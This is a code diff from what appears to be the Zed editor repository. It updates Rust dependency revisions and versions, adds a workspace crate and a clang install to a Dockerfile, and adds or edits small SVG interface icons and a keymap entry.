@@ -12322,7 +12437,7 @@ dependencies = [
[[package]]
name = "pet-pyenv"
version = "0.1.0"
-source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16"
+source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056"
dependencies = [
"lazy_static",
"log",
@@ -12340,7 +12455,7 @@ dependencies = [
[[package]]
name = "pet-python-utils"
version = "0.1.0"
-source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16"
+source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056"
dependencies = [
"env_logger 0.10.2",
"lazy_static",
@@ -12357,7 +12472,7 @@ dependencies = [
[[package]]
name = "pet-reporter"
version = "0.1.0"
-source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16"
+source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056"
dependencies = [
"env_logger 0.10.2",
"log",
@@ -12371,7 +12486,7 @@ dependencies = [
[[package]]
name = "pet-telemetry"
version = "0.1.0"
-source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16"
+source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056"
dependencies = [
"env_logger 0.10.2",
"lazy_static",
@@ -12386,7 +12501,7 @@ dependencies = [
[[package]]
name = "pet-uv"
version = "0.1.0"
-source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16"
+source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056"
dependencies = [
"log",
"pet-core",
@@ -12398,7 +12513,7 @@ dependencies = [
[[package]]
name = "pet-venv"
version = "0.1.0"
-source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16"
+source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056"
dependencies = [
"log",
"msvc_spectre_libs",
@@ -12410,7 +12525,7 @@ dependencies = [
[[package]]
name = "pet-virtualenv"
version = "0.1.0"
-source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16"
+source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056"
dependencies = [
"log",
"msvc_spectre_libs",
@@ -12422,7 +12537,7 @@ dependencies = [
[[package]]
name = "pet-virtualenvwrapper"
version = "0.1.0"
-source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16"
+source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056"
dependencies = [
"log",
"msvc_spectre_libs",
@@ -12435,7 +12550,7 @@ dependencies = [
[[package]]
name = "pet-windows-registry"
version = "0.1.0"
-source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16"
+source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056"
dependencies = [
"lazy_static",
"log",
@@ -12453,7 +12568,7 @@ dependencies = [
[[package]]
name = "pet-windows-store"
version = "0.1.0"
-source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16"
+source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056"
dependencies = [
"lazy_static",
"log",
@@ -12466,6 +12581,20 @@ dependencies = [
"winreg 0.55.0",
]
+[[package]]
+name = "pet-winpython"
+version = "0.1.0"
+source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056"
+dependencies = [
+ "lazy_static",
+ "log",
+ "pet-core",
+ "pet-fs",
+ "pet-python-utils",
+ "pet-virtualenv",
+ "regex",
+]
+
[[package]]
name = "petgraph"
version = "0.6.5"
@@ -134,6 +134,7 @@ members = [
"crates/notifications",
"crates/ollama",
"crates/onboarding",
+ "crates/opencode",
"crates/open_ai",
"crates/open_path_prompt",
"crates/open_router",
@@ -381,6 +382,7 @@ node_runtime = { path = "crates/node_runtime" }
notifications = { path = "crates/notifications" }
ollama = { path = "crates/ollama" }
onboarding = { path = "crates/onboarding" }
+opencode = { path = "crates/opencode" }
open_ai = { path = "crates/open_ai" }
open_path_prompt = { path = "crates/open_path_prompt" }
open_router = { path = "crates/open_router", features = ["schemars"] }
@@ -475,12 +477,11 @@ ztracing_macro = { path = "crates/ztracing_macro" }
# External crates
#
-agent-client-protocol = { version = "=0.9.4", features = ["unstable"] }
+agent-client-protocol = { version = "=0.10.2", features = ["unstable"] }
aho-corasick = "1.1"
alacritty_terminal = { git = "https://github.com/zed-industries/alacritty", rev = "9d9640d4" }
any_vec = "0.14"
anyhow = "1.0.86"
-arrayvec = { version = "0.7.4", features = ["serde"] }
ashpd = { version = "0.13", default-features = false, features = [
"async-io",
"notification",
@@ -513,7 +514,6 @@ aws-smithy-runtime-api = { version = "1.9.2", features = ["http-1x", "client"] }
aws-smithy-types = { version = "1.3.4", features = ["http-body-1-x"] }
backtrace = "0.3"
base64 = "0.22"
-bincode = "1.2.1"
bitflags = "2.6.0"
brotli = "8.0.2"
bytes = "1.0"
@@ -551,19 +551,21 @@ derive_more = { version = "2.1.1", features = [
dirs = "4.0"
documented = "0.9.1"
dotenvy = "0.15.0"
+dunce = "1.0"
ec4rs = "1.1"
emojis = "0.6.1"
env_logger = "0.11"
encoding_rs = "0.8"
exec = "0.3.1"
-fancy-regex = "0.16.0"
+fancy-regex = "0.17.0"
fork = "0.4.0"
futures = "0.3"
futures-concurrency = "7.7.1"
futures-lite = "1.13"
-gh-workflow = { git = "https://github.com/zed-industries/gh-workflow", rev = "c9eac0ed361583e1072860d96776fa52775b82ac" }
+gh-workflow = { git = "https://github.com/zed-industries/gh-workflow", rev = "37f3c0575d379c218a9c455ee67585184e40d43f" }
git2 = { version = "0.20.1", default-features = false, features = ["vendored-libgit2"] }
globset = "0.4"
+heapless = "0.9.2"
handlebars = "4.3"
heck = "0.5"
heed = { version = "0.21.0", features = ["read-txn-no-tls"] }
@@ -572,7 +574,6 @@ human_bytes = "0.4.1"
html5ever = "0.27.0"
http = "1.1"
http-body = "1.0"
-hyper = "0.14"
ignore = "0.4.22"
image = "0.25.1"
imara-diff = "0.1.8"
@@ -597,13 +598,13 @@ markup5ever_rcdom = "0.3.0"
metal = "0.33"
minidumper = "0.9"
moka = { version = "0.12.10", features = ["sync"] }
-naga = { version = "28.0", features = ["wgsl-in"] }
+naga = { version = "29.0", features = ["wgsl-in"] }
nanoid = "0.4"
nbformat = "1.2.0"
nix = "0.29"
num-format = "0.4.4"
objc = "0.2"
-objc2-foundation = { version = "=0.3.1", default-features = false, features = [
+objc2-foundation = { version = "=0.3.2", default-features = false, features = [
"NSArray",
"NSAttributedString",
"NSBundle",
@@ -637,13 +638,13 @@ parse_int = "0.9"
pciid-parser = "0.8.0"
pathdiff = "0.2"
percent-encoding = "2.3.2"
-pet = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" }
-pet-conda = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" }
-pet-core = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" }
-pet-fs = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" }
-pet-poetry = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" }
-pet-reporter = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" }
-pet-virtualenv = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" }
+pet = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "9e61a22af989fe54937bf07c9f9cff1bc53d9056" }
+pet-conda = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "9e61a22af989fe54937bf07c9f9cff1bc53d9056" }
+pet-core = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "9e61a22af989fe54937bf07c9f9cff1bc53d9056" }
+pet-fs = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "9e61a22af989fe54937bf07c9f9cff1bc53d9056" }
+pet-poetry = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "9e61a22af989fe54937bf07c9f9cff1bc53d9056" }
+pet-reporter = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "9e61a22af989fe54937bf07c9f9cff1bc53d9056" }
+pet-virtualenv = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "9e61a22af989fe54937bf07c9f9cff1bc53d9056" }
portable-pty = "0.9.0"
postage = { version = "0.5", features = ["futures-traits"] }
pretty_assertions = { version = "1.3.0", features = ["unstable"] }
@@ -690,7 +691,6 @@ serde_json_lenient = { version = "0.2", features = [
"raw_value",
] }
serde_path_to_error = "0.1.17"
-serde_repr = "0.1"
serde_urlencoded = "0.7"
sha2 = "0.10"
shellexpand = "2.1.0"
@@ -719,9 +719,8 @@ time = { version = "0.3", features = [
"formatting",
"local-offset",
] }
-tiny_http = "0.8"
+tiny_http = "0.12"
tokio = { version = "1" }
-tokio-tungstenite = { version = "0.26", features = ["__rustls-tls"] }
tokio-socks = { version = "0.5.2", default-features = false, features = [
"futures-io",
"tokio",
@@ -753,7 +752,7 @@ tree-sitter-md = { git = "https://github.com/tree-sitter-grammars/tree-sitter-ma
tree-sitter-python = "0.25"
tree-sitter-regex = "0.24"
tree-sitter-ruby = "0.23"
-tree-sitter-rust = "0.24"
+tree-sitter-rust = "0.24.1"
tree-sitter-typescript = { git = "https://github.com/zed-industries/tree-sitter-typescript", rev = "e2c53597d6a5d9cf7bbe8dccde576fe1e46c5899" } # https://github.com/tree-sitter/tree-sitter-typescript/pull/347
tree-sitter-yaml = { git = "https://github.com/zed-industries/tree-sitter-yaml", rev = "baff0b51c64ef6a1fb1f8390f3ad6015b83ec13a" }
tracing = "0.1.40"
@@ -782,7 +781,8 @@ wax = "0.7"
which = "6.0.0"
wasm-bindgen = "0.2.113"
web-time = "1.1.0"
-wgpu = { git = "https://github.com/zed-industries/wgpu", rev = "465557eccfe77c840a9b4936f1408da9503372c4" }
+webrtc-sys = "0.3.23"
+wgpu = { git = "https://github.com/zed-industries/wgpu.git", branch = "v29" }
windows-core = "0.61"
yawc = "0.2.5"
zeroize = "1.8"
@@ -850,8 +850,9 @@ notify = { git = "https://github.com/zed-industries/notify.git", rev = "ce58c24c
notify-types = { git = "https://github.com/zed-industries/notify.git", rev = "ce58c24cad542c28e04ced02e20325a4ec28a31d" }
windows-capture = { git = "https://github.com/zed-industries/windows-capture.git", rev = "f0d6c1b6691db75461b732f6d5ff56eed002eeb9" }
calloop = { git = "https://github.com/zed-industries/calloop" }
-livekit = { git = "https://github.com/zed-industries/livekit-rust-sdks", rev = "37835f840d0070d45ac8b31cce6a6ae7aca3f459" }
-libwebrtc = { git = "https://github.com/zed-industries/livekit-rust-sdks", rev = "37835f840d0070d45ac8b31cce6a6ae7aca3f459" }
+livekit = { git = "https://github.com/zed-industries/livekit-rust-sdks", rev = "c1209aa155cbf4543383774f884a46ae7e53ee2e" }
+libwebrtc = { git = "https://github.com/zed-industries/livekit-rust-sdks", rev = "c1209aa155cbf4543383774f884a46ae7e53ee2e" }
+webrtc-sys = { git = "https://github.com/zed-industries/livekit-rust-sdks", rev = "c1209aa155cbf4543383774f884a46ae7e53ee2e" }
[profile.dev]
split-debuginfo = "unpacked"
@@ -14,8 +14,12 @@ ARG GITHUB_SHA
ENV GITHUB_SHA=$GITHUB_SHA
# Also add `cmake`, since we need it to build `wasmtime`.
+# clang is needed because `webrtc-sys` uses Clang-specific compiler flags.
RUN apt-get update; \
- apt-get install -y --no-install-recommends cmake
+ apt-get install -y --no-install-recommends cmake clang
+
+ENV CC=clang
+ENV CXX=clang++
RUN --mount=type=cache,target=./script/node_modules \
--mount=type=cache,target=/usr/local/cargo/registry \
@@ -122,6 +122,5 @@ vim
= @probably-neb
windows
- = @localcc
= @reflectronic
= @Veykril
@@ -0,0 +1,3 @@
+<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">
+<path d="M11.2 3.2H4.8V12.8H11.2V3.2ZM14.4 16H1.6V0H14.4V16Z" fill="black"/>
+</svg>
@@ -0,0 +1,5 @@
+<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">
+<path d="M13.4 2.60001H2.6C2.26863 2.60001 2 2.86864 2 3.20001V5.00001C2 5.33138 2.26863 5.60001 2.6 5.60001H13.4C13.7314 5.60001 14 5.33138 14 5.00001V3.20001C14 2.86864 13.7314 2.60001 13.4 2.60001Z" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round" stroke-linejoin="round"/>
+<path d="M3.2 5.60004V12.2C3.2 12.5183 3.32643 12.8235 3.55147 13.0486C3.77651 13.2736 4.08174 13.4 4.4 13.4H11.6C11.9183 13.4 12.2235 13.2736 12.4485 13.0486C12.6736 12.8235 12.8 12.5183 12.8 12.2V5.60004" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round" stroke-linejoin="round"/>
+<path d="M6.8 8H9.2" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round" stroke-linejoin="round"/>
+</svg>
@@ -0,0 +1,6 @@
+<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">
+<path d="M9.5248 9.52487C9.32192 9.74576 9.07604 9.92297 8.80229 10.0457C8.52854 10.1685 8.23269 10.2341 7.93287 10.2384C7.63305 10.2427 7.33543 10.1857 7.05826 10.0709C6.78109 9.95608 6.53019 9.78592 6.32115 9.57088C6.11211 9.35584 5.94929 9.10052 5.84242 8.82002C5.73556 8.53953 5.68693 8.23974 5.69959 7.93908C5.71225 7.63842 5.78588 7.34389 5.9159 7.07326C6.04593 6.80263 6.22978 6.56148 6.45605 6.36487" stroke="black" stroke-width="1.2" stroke-linecap="round" stroke-linejoin="round"/>
+<path d="M6.58521 3.93988C7.04677 3.8469 7.51825 3.80005 7.99115 3.80055C9.27177 3.80055 10.5219 4.18055 11.584 4.89055C12.6461 5.60055 13.472 6.61055 13.956 7.79055C13.9839 7.85737 13.9989 7.92893 14 8.00131C14.0011 8.07369 13.9882 8.14566 13.9622 8.21327C13.706 8.81927 13.3778 9.39377 12.9841 9.92417" stroke="black" stroke-width="1.2" stroke-linecap="round" stroke-linejoin="round"/>
+<path d="M3.48047 5.37988C2.85585 5.97555 2.36015 6.69431 2.02605 7.49388C1.90005 7.80488 1.90005 8.15188 2.02605 8.46288C2.52405 9.64988 3.35605 10.6599 4.41705 11.3699C5.47805 12.0799 6.72205 12.4559 7.99305 12.4559C9.01905 12.4559 10.0291 12.2019 10.9311 11.7179" stroke="black" stroke-width="1.2" stroke-linecap="round" stroke-linejoin="round"/>
+<path d="M2 2L14 14" stroke="black" stroke-width="1.2" stroke-linecap="round" stroke-linejoin="round"/>
+</svg>
@@ -0,0 +1,7 @@
+<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">
+<path d="M8 9.5C8.82843 9.5 9.5 8.82843 9.5 8C9.5 7.17157 8.82843 6.5 8 6.5C7.17157 6.5 6.5 7.17157 6.5 8C6.5 8.82843 7.17157 9.5 8 9.5Z" fill="#C6CAD0"/>
+<path d="M2.25 4.80555V3.52777C2.25 3.18889 2.38462 2.86388 2.62425 2.62425C2.86388 2.38462 3.18889 2.25 3.52777 2.25H4.80555" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round" stroke-linejoin="round"/>
+<path d="M11.1945 2.25H12.4722C12.8111 2.25 13.1361 2.38462 13.3758 2.62425C13.6154 2.86388 13.75 3.18889 13.75 3.52777V4.80555" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round" stroke-linejoin="round"/>
+<path d="M13.75 11.1945V12.4722C13.75 12.8111 13.6154 13.1361 13.3758 13.3758C13.1361 13.6154 12.8111 13.75 12.4722 13.75H11.1945" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round" stroke-linejoin="round"/>
+<path d="M4.80555 13.75H3.52777C3.18889 13.75 2.86388 13.6154 2.62425 13.3758C2.38462 13.1361 2.25 12.8111 2.25 12.4722V11.1945" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round" stroke-linejoin="round"/>
+</svg>
@@ -0,0 +1,5 @@
+<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">
+<path d="M8 7.29524V10.6536" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round" stroke-linejoin="round"/>
+<path d="M6.3208 8.97442H9.67917" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round" stroke-linejoin="round"/>
+<path d="M12.8 13C13.1183 13 13.4235 12.8761 13.6486 12.6554C13.8735 12.4349 14 12.1356 14 11.8236V5.94118C14 5.62916 13.8735 5.32992 13.6486 5.10929C13.4235 4.88866 13.1183 4.76471 12.8 4.76471H8.06C7.8593 4.76664 7.66133 4.71919 7.48418 4.6267C7.30703 4.53421 7.15637 4.39964 7.046 4.2353L6.56 3.52941C6.45073 3.36675 6.30199 3.23322 6.1271 3.14082C5.95221 3.04842 5.75666 3.00004 5.558 3H3.2C2.88174 3 2.57651 3.12395 2.35148 3.34458C2.12643 3.56521 2 3.86445 2 4.17647V11.8236C2 12.1356 2.12643 12.4349 2.35148 12.6554C2.57651 12.8761 2.88174 13 3.2 13H12.8Z" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round" stroke-linejoin="round"/>
+</svg>
@@ -0,0 +1,7 @@
+<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">
+<path d="M8 4.32848H10.4477C10.7723 4.32848 11.0835 4.45742 11.3131 4.68693C11.5426 4.91644 11.6715 5.22773 11.6715 5.55232V9.83575" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round" stroke-linejoin="round"/>
+<path d="M4.32849 8V13.5073" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round" stroke-linejoin="round"/>
+<path d="M6.16426 2.49272L2.49274 6.16424" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round" stroke-linejoin="round"/>
+<path d="M6.16426 6.16424L2.49274 2.49272" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round" stroke-linejoin="round"/>
+<path d="M11.6715 13.5073C12.6854 13.5073 13.5073 12.6854 13.5073 11.6715C13.5073 10.6577 12.6854 9.83575 11.6715 9.83575C10.6577 9.83575 9.83575 10.6577 9.83575 11.6715C9.83575 12.6854 10.6577 13.5073 11.6715 13.5073Z" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round" stroke-linejoin="round"/>
+</svg>
@@ -0,0 +1,7 @@
+<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">
+<path d="M7.99567 13.0812C8.93101 13.0812 9.68925 12.3229 9.68925 11.3876C9.68925 10.4522 8.93101 9.694 7.99567 9.694C7.06033 9.694 6.30209 10.4522 6.30209 11.3876C6.30209 12.3229 7.06033 13.0812 7.99567 13.0812Z" stroke="#A9AFBC" stroke-width="1.2" stroke-linecap="round" stroke-linejoin="round"/>
+<path d="M4.61023 6.30643C5.54557 6.30643 6.30381 5.54819 6.30381 4.61286C6.30381 3.67752 5.54557 2.91928 4.61023 2.91928C3.6749 2.91928 2.91666 3.67752 2.91666 4.61286C2.91666 5.54819 3.6749 6.30643 4.61023 6.30643Z" stroke="#A9AFBC" stroke-width="1.2" stroke-linecap="round" stroke-linejoin="round"/>
+<path d="M11.3915 6.30643C12.3268 6.30643 13.0851 5.54819 13.0851 4.61286C13.0851 3.67752 12.3268 2.91928 11.3915 2.91928C10.4561 2.91928 9.69791 3.67752 9.69791 4.61286C9.69791 5.54819 10.4561 6.30643 11.3915 6.30643Z" stroke="#A9AFBC" stroke-width="1.2" stroke-linecap="round" stroke-linejoin="round"/>
+<path d="M11.3889 6.306V7.43505C11.3889 7.77377 11.1631 7.99958 10.8244 7.99958H5.17912C4.8404 7.99958 4.61459 7.77377 4.61459 7.43505V6.306" stroke="#A9AFBC" stroke-width="1.2" stroke-linecap="round" stroke-linejoin="round"/>
+<path d="M8 8V9.69358" stroke="#A9AFBC" stroke-width="1.2" stroke-linecap="round" stroke-linejoin="round"/>
+</svg>
@@ -0,0 +1,6 @@
+<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">
+<path d="M12.5 3V14" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round"/>
+<path d="M9.5 6V14" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round"/>
+<path d="M6.5 9V14" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round"/>
+<path d="M3.5 12V14" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round"/>
+</svg>
@@ -0,0 +1,6 @@
+<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">
+<path opacity="0.2" d="M12.5 3V14" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round"/>
+<path opacity="0.2" d="M9.5 6V14" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round"/>
+<path d="M6.5 9V14" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round"/>
+<path d="M3.5 12V14" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round"/>
+</svg>
@@ -0,0 +1,6 @@
+<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">
+<path opacity="0.2" d="M12.5 3V14" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round"/>
+<path d="M9.5 6V14" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round"/>
+<path d="M6.5 9V14" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round"/>
+<path d="M3.5 12V14" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round"/>
+</svg>
@@ -1,3 +1,3 @@
<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">
-<path d="M5 10.8V5.2C5 5.08954 5.08954 5 5.2 5H10.8C10.9105 5 11 5.08954 11 5.2V10.8C11 10.9105 10.9105 11 10.8 11H5.2C5.08954 11 5 10.9105 5 10.8Z" fill="black" stroke="black" stroke-width="1.2" stroke-linejoin="round"/>
+<path d="M4.5 11.2667V4.73333C4.5 4.60446 4.60446 4.5 4.73333 4.5H11.2667C11.3956 4.5 11.5 4.60446 11.5 4.73333V11.2667C11.5 11.3956 11.3956 11.5 11.2667 11.5H4.73333C4.60446 11.5 4.5 11.3956 4.5 11.2667Z" fill="#C6CAD0" stroke="#C6CAD0" stroke-width="1.2" stroke-linejoin="round"/>
</svg>
@@ -1,3 +1,4 @@
<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">
-<path d="M6.31254 12.549C7.3841 13.0987 8.61676 13.2476 9.78839 12.9688C10.96 12.6901 11.9936 12.0021 12.7028 11.0287C13.412 10.0554 13.7503 8.8607 13.6566 7.66002C13.5629 6.45934 13.0435 5.33159 12.1919 4.48C11.3403 3.62841 10.2126 3.10898 9.01188 3.01531C7.8112 2.92164 6.61655 3.2599 5.64319 3.96912C4.66984 4.67834 3.9818 5.71188 3.70306 6.88351C3.42432 8.05514 3.5732 9.2878 4.12289 10.3594L3 13.6719L6.31254 12.549Z" stroke="black" stroke-width="1.2" stroke-linecap="round" stroke-linejoin="round"/>
+<path opacity="0.12" d="M6.31254 12.549C7.3841 13.0987 8.61676 13.2476 9.78839 12.9688C10.96 12.6901 11.9936 12.0021 12.7028 11.0287C13.412 10.0554 13.7503 8.8607 13.6566 7.66002C13.5629 6.45934 13.0435 5.33159 12.1919 4.48C11.3403 3.62841 10.2126 3.10898 9.01188 3.01531C7.8112 2.92164 6.61655 3.2599 5.64319 3.96912C4.66984 4.67834 3.9818 5.71188 3.70306 6.88351C3.42432 8.05514 3.5732 9.2878 4.12289 10.3594L3 13.6719L6.31254 12.549Z" fill="#C6CAD0"/>
+<path d="M5.97658 12.549C7.04814 13.0987 8.2808 13.2476 9.45243 12.9688C10.624 12.6901 11.6576 12.0021 12.3668 11.0287C13.076 10.0554 13.4143 8.8607 13.3206 7.66002C13.2269 6.45934 12.7075 5.33159 11.8559 4.48C11.0043 3.62841 9.87664 3.10898 8.67592 3.01531C7.47524 2.92164 6.28059 3.2599 5.30723 3.96912C4.33388 4.67834 3.64584 5.71188 3.3671 6.88351C3.08836 8.05514 3.23724 9.2878 3.78693 10.3594L2.66404 13.6719L5.97658 12.549Z" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round" stroke-linejoin="round"/>
</svg>
@@ -0,0 +1,5 @@
+<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">
+<rect opacity="0.1" width="5" height="12" rx="2" transform="matrix(-1 0 0 1 7 2)" fill="#C6CAD0"/>
+<path d="M7 2V14" stroke="#C6CAD0" stroke-width="1.2"/>
+<rect x="2" y="2" width="12" height="12" rx="1.5" stroke="#C6CAD0" stroke-width="1.2"/>
+</svg>
@@ -0,0 +1,5 @@
+<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">
+<rect opacity="0.8" width="5" height="12" rx="2" transform="matrix(-1 0 0 1 7 2)" fill="#C6CAD0"/>
+<path d="M7 2V14" stroke="#C6CAD0" stroke-width="1.2"/>
+<rect x="2" y="2" width="12" height="12" rx="1.5" stroke="#C6CAD0" stroke-width="1.2"/>
+</svg>
@@ -0,0 +1,5 @@
+<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">
+<rect opacity="0.1" width="5" height="12" rx="2" transform="matrix(-1 0 0 1 14 2)" fill="#C6CAD0"/>
+<path d="M9 2V14" stroke="#C6CAD0" stroke-width="1.2"/>
+<rect x="2" y="2" width="12" height="12" rx="1.5" stroke="#C6CAD0" stroke-width="1.2"/>
+</svg>
@@ -0,0 +1,5 @@
+<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">
+<rect opacity="0.8" width="5" height="12" rx="2" transform="matrix(-1 0 0 1 14 2)" fill="#C6CAD0"/>
+<path d="M9 2V14" stroke="#C6CAD0" stroke-width="1.2"/>
+<rect x="2" y="2" width="12" height="12" rx="1.5" stroke="#C6CAD0" stroke-width="1.2"/>
+</svg>
@@ -1,5 +0,0 @@
-<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">
-<rect opacity="0.2" width="7" height="12" rx="2" transform="matrix(-1 0 0 1 9 2)" fill="#C6CAD0"/>
-<path d="M9 2V14" stroke="#C6CAD0" stroke-width="1.2"/>
-<rect x="2" y="2" width="12" height="12" rx="2" stroke="#C6CAD0" stroke-width="1.2"/>
-</svg>
@@ -1,5 +0,0 @@
-<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">
-<rect width="7" height="12" rx="2" transform="matrix(-1 0 0 1 9 2)" fill="#C6CAD0"/>
-<path d="M9 2V14" stroke="#C6CAD0" stroke-width="1.2"/>
-<rect x="2" y="2" width="12" height="12" rx="2" stroke="#C6CAD0" stroke-width="1.2"/>
-</svg>
@@ -31,7 +31,6 @@
"ctrl-+": ["zed::IncreaseBufferFontSize", { "persist": false }],
"ctrl--": ["zed::DecreaseBufferFontSize", { "persist": false }],
"ctrl-0": ["zed::ResetBufferFontSize", { "persist": false }],
- "ctrl-,": "zed::OpenSettings",
"ctrl-alt-,": "zed::OpenSettingsFile",
